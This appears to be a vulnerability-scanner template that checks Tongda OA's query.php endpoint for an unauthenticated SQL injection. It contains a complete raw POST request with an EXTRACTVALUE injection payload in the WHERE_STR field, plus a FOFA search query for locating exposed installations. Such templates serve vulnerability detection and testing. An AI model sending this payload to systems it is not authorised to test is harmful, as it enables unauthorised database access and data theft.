id: TongDa-21

info:
  name: 通达OA /general/management_center/portal/oa_engine/engine_manage_bulletin_number/query.php 存在前台SQL注入漏洞
  author: pussycat0x
  severity: high
  description: |
    通达OA /general/management_center/portal/oa_engine/engine_manage_bulletin_number/query.php 存在前台SQL注入漏洞，攻击者无需登录可以利用漏洞获取数据库内敏感信息。
  metadata:
    verified: true
    max-request: 1
    fofa-query: app="通达OA网络智能办公系统"
  tags: TongDa,OA,SQL注入漏洞
request:
  - raw:
      - |
        POST /general/management_center/portal/oa_engine/engine_manage_bulletin_number/query.php HTTP/1.1
        Host: {{RootURL}}
        Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
        Upgrade-Insecure-Requests: 1
        Accept-Encoding: gzip, deflate
        Connection: close
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
        Content-Type: application/x-www-form-urlencoded
        Content-Length: 82
        
        WHERE_STR=-@`'` AND EXTRACTVALUE(4266,CASE WHEN(4266=1024)THEN 4266 ELSE 0x3A END)
    matchers-condition: and
    matchers:
      - type: word
        part: body
        words: 
          - "query.php"